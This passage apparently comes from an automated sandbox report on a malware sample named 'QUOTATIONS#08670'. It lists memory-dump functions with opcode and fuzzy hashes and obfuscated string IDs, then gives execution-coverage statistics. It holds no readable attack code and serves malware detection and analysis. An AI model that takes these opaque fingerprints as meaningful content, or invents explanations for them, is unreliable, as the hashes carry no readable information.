                                                          • Instruction Fuzzy Hash: 6C5191B0F10205DBEF645AB8D95473F266ED788310F20597AF00ADB7A8CA7DCC4583A2
                                                          Function 06BE5460 Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07bc2cc0aba4723cd267b959aa3990577ec3de7e8783e60909f82c77e979b5a6
                                                          • Instruction ID: 661dfaaed344f88a4d35ff0bb6bd92058e28f1d601254dd1672a170ebcdeaf34
                                                          • Opcode Fuzzy Hash: 07bc2cc0aba4723cd267b959aa3990577ec3de7e8783e60909f82c77e979b5a6
                                                          • Instruction Fuzzy Hash: 2D4171B2E006098FDB70CFA9D880AAFFBF2FB54314F10496AE256D7654D331E9558B90
                                                          Function 06BED9B8 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9d8d829c7451e0e7364d07c8f4fafdbb552fd2febbefb14d5d81dcd96997300
                                                          • Instruction ID: 2bcb9c7a305627e93ba479365fdb9a3ef8b5632f7b3dc47fa35b89fa699058a6
                                                          • Opcode Fuzzy Hash: c9d8d829c7451e0e7364d07c8f4fafdbb552fd2febbefb14d5d81dcd96997300
                                                          • Instruction Fuzzy Hash: 3231F470E1030A9FCF25DF65D88069EBBB6FF85304F10A569E506EB254DBB0E946CB81
                                                          Function 06BE20A0 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 595e329fd5c00e1fd90d53daf2e80bfed48d157d9ac0ae041e6c10cf5e08a0cf
                                                          • Instruction ID: deeaa6fb86ed46a31b0e4890ffec6d0d0aee8782a6bce52664f26f6182bc591d
                                                          • Opcode Fuzzy Hash: 595e329fd5c00e1fd90d53daf2e80bfed48d157d9ac0ae041e6c10cf5e08a0cf
                                                          • Instruction Fuzzy Hash: DA31F070E00219CFDB15CFA4D8A469EBBB6FF89300F108469E946EB354DB30AE46CB51
                                                          Function 06BE20B0 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d49acd730f63b32bdfed97786093cf19b5711a3534ee1fe32d86bef9bc8225a2
                                                          • Instruction ID: 0119c64ac5eabcfc68d5dd7dc4d58f02316a6b5ec0f94c4eb807afefb0685663
                                                          • Opcode Fuzzy Hash: d49acd730f63b32bdfed97786093cf19b5711a3534ee1fe32d86bef9bc8225a2
                                                          • Instruction Fuzzy Hash: 9D31AC70E1021ADBDB59DFA4D85469EB7F6FF89300F108429EA06E7350DB71AE42CB91
                                                          Function 06BE3EF0 Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2dbd199e43edd98e8df8f34798f55ec9fdd3f6d0af0d70470bd8d1a127f168c
                                                          • Instruction ID: 61e7c3e5ac9c15294aa95f4ef2410d2aeec7650160d95d55db3026e586bcba74
                                                          • Opcode Fuzzy Hash: b2dbd199e43edd98e8df8f34798f55ec9fdd3f6d0af0d70470bd8d1a127f168c
                                                          • Instruction Fuzzy Hash: 402189B5E00215DFDB50CFA8D880AAEBBF1EB88310F148069E945EB351E739DD428B90
                                                          Function 06BE3F00 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9761efc180d929fe1026f7cfae4bb1ab9e2944a79c0e7dabaceeec4e3f05aceb
                                                          • Instruction ID: 2964cd4d6d9b768a0853014cd4aecfcc85c1beaa2740e86dd0e77a05c88bc68e
                                                          • Opcode Fuzzy Hash: 9761efc180d929fe1026f7cfae4bb1ab9e2944a79c0e7dabaceeec4e3f05aceb
                                                          • Instruction Fuzzy Hash: 73217AB5E00215DFDB50CFA9D980AAEB7F1EB48710F108069E905EB351EB38DC418B91
                                                          Function 0141D030 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6999327eed71464d7c23b09ca73d37e7bd099d84d3004acb7d466512f77b6f08
                                                          • Instruction ID: d064df7c00dd7b4314476c79c672bf8aa8da61b1a269137ecc8062422732c6fe
                                                          • Opcode Fuzzy Hash: 6999327eed71464d7c23b09ca73d37e7bd099d84d3004acb7d466512f77b6f08
                                                          • Instruction Fuzzy Hash: 4D2125F5904204DFCB15DF58D988B26BF65EB84318F20C56EE80A0B36AC336D447CA62
                                                          Function 0141D118 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7566a223df939421ab0aeb2b0e3456ba8759638bfb3a56c375621466882a3ddb
                                                          • Instruction ID: d0891bdf1e518e4552b554a994b45abd45cdf0187fb39e26b1dec5c9ec4b3ef6
                                                          • Opcode Fuzzy Hash: 7566a223df939421ab0aeb2b0e3456ba8759638bfb3a56c375621466882a3ddb
                                                          • Instruction Fuzzy Hash: 9E2104B1A44204DFDB05DF58C9C8B26BF65FB84314F24C56EE8094B36AC33AD846C661
                                                          Function 06BE6D60 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a64be45e3884b5636a705d0d02922b6d602da97abeec04c0ebe50419ae6a4cc
                                                          • Instruction ID: 0abae5842890321b55a73b8c7af603d7a068afdffe0fad0e2ed8c7ef569a68d9
                                                          • Opcode Fuzzy Hash: 3a64be45e3884b5636a705d0d02922b6d602da97abeec04c0ebe50419ae6a4cc
                                                          • Instruction Fuzzy Hash: 0F21D274B101199FDF44DB69E95479DB7B6EB84310F208579D405EB385EB36AD018B80
                                                          Function 0141D006 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8391b7df7fe21662f43eeaa25d7396422d372d272c560a63afbe20b2a59f1211
                                                          • Instruction ID: 4f1f83f6ee9156d7f3f97d90d1650db74e768bde0c8aace6be6f7bbc548f3971
                                                          • Opcode Fuzzy Hash: 8391b7df7fe21662f43eeaa25d7396422d372d272c560a63afbe20b2a59f1211
                                                          • Instruction Fuzzy Hash: D5216B755093C08FDB07CF64C994711BF71AB46214F29C5EBD8898F2A7C23A980ACB62
                                                          Function 06BE4010 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 433a338f6f909ef224cdc681e460718957c607896c212d43a4aabf7fe00dc098
                                                          • Instruction ID: 5d31230013466be8342a3249b86e69db70b210b0393ed0735dd107e8d150d02b
                                                          • Opcode Fuzzy Hash: 433a338f6f909ef224cdc681e460718957c607896c212d43a4aabf7fe00dc098
                                                          • Instruction Fuzzy Hash: F611C431B001289FDB54DA78D8106AF73EAEBC8351F008979D50AE7341EF69DC068BD1
                                                          Function 06BE4248 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8600b8dcbc0d0a2d881d0f0b1ed540fb13af7a91e58d21e32747edb5d2f28750
                                                          • Instruction ID: 897462e0c7ef51838f5199e598e4811dbb64b24219f9f827a92469ae9ac80639
                                                          • Opcode Fuzzy Hash: 8600b8dcbc0d0a2d881d0f0b1ed540fb13af7a91e58d21e32747edb5d2f28750
                                                          • Instruction Fuzzy Hash: 5C014775B241520FDB61DABD981075AABDBCBDA720F1484BFE14AC7396EB24CC078391
                                                          Function 06BE3CC8 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: da1b7eededb413130ecc9b33e6ad997693a576d34652757e8fb536f167f55dbc
                                                          • Instruction ID: 55bb33928e91004169abb52cc54be0309c77eec1d383d3ba67e2fe9183206297
                                                          • Opcode Fuzzy Hash: da1b7eededb413130ecc9b33e6ad997693a576d34652757e8fb536f167f55dbc
                                                          • Instruction Fuzzy Hash: 1F21C0B5D01219AFCB40DF9AD884ADEFBB8FB49310F10816AE518B7250C375A954CBA5
                                                          Function 06BE237C Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83aed5e2fb6abb69b77574836dfb87ae61582c141ee0f1f81d503a56b626c3b3
                                                          • Instruction ID: 8f89d4abbf9932104e676b1d8547fcc4a90c61eac707b67a8df62e0bf563fa6c
                                                          • Opcode Fuzzy Hash: 83aed5e2fb6abb69b77574836dfb87ae61582c141ee0f1f81d503a56b626c3b3
                                                          • Instruction Fuzzy Hash: 3021FFB5D01219AFCB40DF9AD884ADEFBF4FB48310F10816AEA18B7241D375A954CBE4
                                                          Function 06BE3FFF Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0ca1fc371f95ca874c6b3965d1f311f272708b752bd2aee5f1083da26a68467
                                                          • Instruction ID: 9aceab78aea2612b7265708c361ebeaddb10d2411d0510078e984de97fedbce9
                                                          • Opcode Fuzzy Hash: a0ca1fc371f95ca874c6b3965d1f311f272708b752bd2aee5f1083da26a68467
                                                          • Instruction Fuzzy Hash: 3E01B132F140159BDB989A78E8106EF73EADBC8711F00457AD506E7281EF659C068BE1
                                                          Function 06BEF1E0 Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb49cb53002c9db607ad6aad9311b2ff302047c9520d43565eb963f6d5f471d6
                                                          • Instruction ID: 5974f9696d237a154bf6ad9f245bda942d8bfb0dc4b5b91f2bfb5e73125bb5ed
                                                          • Opcode Fuzzy Hash: eb49cb53002c9db607ad6aad9311b2ff302047c9520d43565eb963f6d5f471d6
                                                          • Instruction Fuzzy Hash: 4801F175B045520BDB61D6BCA860B6AB7CADB85710F10847AF10AC7384EB21DC024395
                                                          Function 0141D113 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5867ea3066c8d66ae14a7e2e82bc980888112c1538e9e79c62cad117a2215a17
                                                          • Instruction ID: 4d72b79ca20a4c32123b83eee38ddb39485a551ce5280542749178e632420f22
                                                          • Opcode Fuzzy Hash: 5867ea3066c8d66ae14a7e2e82bc980888112c1538e9e79c62cad117a2215a17
                                                          • Instruction Fuzzy Hash: 86118EB5904284CFDB06CF54D5C8B16BF72FB44214F24C6AAD8494B766C33AD44ACB51
                                                          Function 06BE4258 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b56714e9cd0c8b85b82bd781034aeee4b81f6cb81024c321090cd2fe7743c04
                                                          • Instruction ID: 4245a61a8c5f57c777117f9ddd7e3500428650d019149e6ed23707ebc6f6e57e
                                                          • Opcode Fuzzy Hash: 1b56714e9cd0c8b85b82bd781034aeee4b81f6cb81024c321090cd2fe7743c04
                                                          • Instruction Fuzzy Hash: 6001D170B201150BDB60EABDA41075FA3CBDBD8720F10C47AE10AC7384EA65DC024391
                                                          Function 06BEA358 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adb5bca53e32f0f3b28096aa02b561b948fa54315a4bdaf0499af575ffa37b03
                                                          • Instruction ID: d5aa77c919a2069a3560b7eb0bc27deab9492a02174b8e27bbf09fefd1b11d5b
                                                          • Opcode Fuzzy Hash: adb5bca53e32f0f3b28096aa02b561b948fa54315a4bdaf0499af575ffa37b03
                                                          • Instruction Fuzzy Hash: 03012674B102148FD7A1EB38E89071E77EAEB46710F108579F10ACB395EE29EC028791
                                                          Function 06BEF1F0 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 592af0b12b9c6ecf74fa38cc35fed156059d92bc44d6450c5baf7c3b8695ce6e
                                                          • Instruction ID: 77721b72fc537ef8327c65389184f3f1f0806a2a1174b46628398d18b840a85a
                                                          • Opcode Fuzzy Hash: 592af0b12b9c6ecf74fa38cc35fed156059d92bc44d6450c5baf7c3b8695ce6e
                                                          • Instruction Fuzzy Hash: C9016D75B105150BDB659AADA450B2E63DAEBC9B20F10847AF50AC7344EB25DC034395
                                                          Function 06BEA368 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a53f2567e0bb8a05f2f71e04ac4575d663b655e1e71deebcca1a5ae7a45e9a53
                                                          • Instruction ID: 450b41a015f0f942259ad49f52388d0cbc3d0c847487fedbcca782cb4ca3f132
                                                          • Opcode Fuzzy Hash: a53f2567e0bb8a05f2f71e04ac4575d663b655e1e71deebcca1a5ae7a45e9a53
                                                          • Instruction Fuzzy Hash: EE013174B105158FDB61EA79E49071E73DAE785714F108579E10ADB354EE25EC128780
                                                          Function 06BE64B8 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c70dbf634c1e7a03bcbf1f68f13f7399cc3ff44a1ea44eeb284c9a2d3665c29
                                                          • Instruction ID: 555e1b4366b293035063e0a81d62ce463f6bfd5e3d0e0f1d9fa2d9bf1f94204a
                                                          • Opcode Fuzzy Hash: 4c70dbf634c1e7a03bcbf1f68f13f7399cc3ff44a1ea44eeb284c9a2d3665c29
                                                          • Instruction Fuzzy Hash: 7FF092B2E141889FDB51CF748A6439A7BB9EB16204F2554E7D448DF202E276CE06C741

                                                          Non-executed Functions

                                                          Function 06BE76E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-698649689
                                                          • Opcode ID: bc626f5d4948c4bfa3b0cb2b8883f909f3f73cc36d662f0c948743789d1a8a8c
                                                          • Instruction ID: d2a721befce2e0974b09431d025e8bf60ea74a02d4bb77cec8e1d4960da1a8b1
                                                          • Opcode Fuzzy Hash: bc626f5d4948c4bfa3b0cb2b8883f909f3f73cc36d662f0c948743789d1a8a8c
                                                          • Instruction Fuzzy Hash: 66122A70A0021ACFDB68DF65C954A9DB7B6FF84304F2085A9D40AAB264EF359D45CF81
                                                          Function 06BEA988 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-2216122830
                                                          • Opcode ID: f00d18edf465a8333c1f693a10321aba6ce5684ae55fec0a3e29771fb780bdd1
                                                          • Instruction ID: 549ab3fba3c4db0feca8b28b4cb60a74233b70b48bc0afd499fe2da13871540f
                                                          • Opcode Fuzzy Hash: f00d18edf465a8333c1f693a10321aba6ce5684ae55fec0a3e29771fb780bdd1
                                                          • Instruction Fuzzy Hash: 08916DB0A0020ADFEB64DF65D944B6E7BFAFF84704F108569E402AB394DB789C45CB90
                                                          Function 06BE70E8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .5wq$$_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-3129995876
                                                          • Opcode ID: 1fcfe3149482a67460322c15fccc229a8bae828aedc89e25e2f91aecfb666bf3
                                                          • Instruction ID: fed19962be3888a39493ee6a1a3d662f346b6ccf8c8360c5683a7c6c4c2b77d3
                                                          • Opcode Fuzzy Hash: 1fcfe3149482a67460322c15fccc229a8bae828aedc89e25e2f91aecfb666bf3
                                                          • Instruction Fuzzy Hash: C7F15D70A00205DFDB59DF69C554A6EBBB6FF94304F208579D406AB3A9CB39AC42CB81
                                                          Function 06BEBA48 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-155944776
                                                          • Opcode ID: 5d5f844b31f9e7f3f3ca0f2099b77a34f4c159d7d9cb293ec97833b9f132f9da
                                                          • Instruction ID: ca2699110eaea865e1b0617955658e61845ab9924f7f1f22b0a33384cc180e5b
                                                          • Opcode Fuzzy Hash: 5d5f844b31f9e7f3f3ca0f2099b77a34f4c159d7d9cb293ec97833b9f132f9da
                                                          • Instruction Fuzzy Hash: 5071AFB0F0021A8FDB68DF69DA4066DB7A6FF84304F1085AAD406EB358DB74DD46CB81
                                                          Function 06BE8420 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q
                                                          • API String ID: 0-1171383116
                                                          • Opcode ID: faa495a4ee42eec017de2fe99f502d49705b9a5507908982fd9827fc975adfec
                                                          • Instruction ID: c67470edda3edcc0676dc68b90f1eef6f01a671c794e7e76dc575bcae2d38627
                                                          • Opcode Fuzzy Hash: faa495a4ee42eec017de2fe99f502d49705b9a5507908982fd9827fc975adfec
                                                          • Instruction Fuzzy Hash: E2B16A70A10609CFDB64DF65C59469EBBB2FF94304F2488AAD406DB3A4DB74DC82CB81
                                                          Function 06BEAD10 Relevance: 5.2, Strings: 4, Instructions: 173COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q
                                                          • API String ID: 0-1171383116
                                                          • Opcode ID: 5c8422e8f72432beac50d1fb321d5ec64dd766b4110df48efd9c87e8f5c14771
                                                          • Instruction ID: 13650587217e2aadaafa6c79bffd80eedfa99e02b808ee253adcd3be01f7b43e
                                                          • Opcode Fuzzy Hash: 5c8422e8f72432beac50d1fb321d5ec64dd766b4110df48efd9c87e8f5c14771
                                                          • Instruction Fuzzy Hash: 1851C2B4A10205DFDF65DB24D980AADB7BAFF84305F2085A9E406EB354CB35DC42CB91
                                                          Function 06BE8838 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR_q$LR_q$$_q$$_q
                                                          • API String ID: 0-2912794808
                                                          • Opcode ID: c3ea724b1f86e0f2a972a200d8625beabf8e9008e3c692ab4a3e44ac7def03a5
                                                          • Instruction ID: 20ba4ba709e5546fcf74ea19b1ae24fc6a4102a10b8f9d1456f1931f19afc6a4
                                                          • Opcode Fuzzy Hash: c3ea724b1f86e0f2a972a200d8625beabf8e9008e3c692ab4a3e44ac7def03a5
                                                          • Instruction Fuzzy Hash: 7E51A074B006029FDB58EF29D950A6A77E6FF88314B1095ADE406EB3A5DB34EC00CB91

                                                          Execution Graph

                                                          Execution Coverage:19.9%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:155
                                                          Total number of Limit Nodes:8
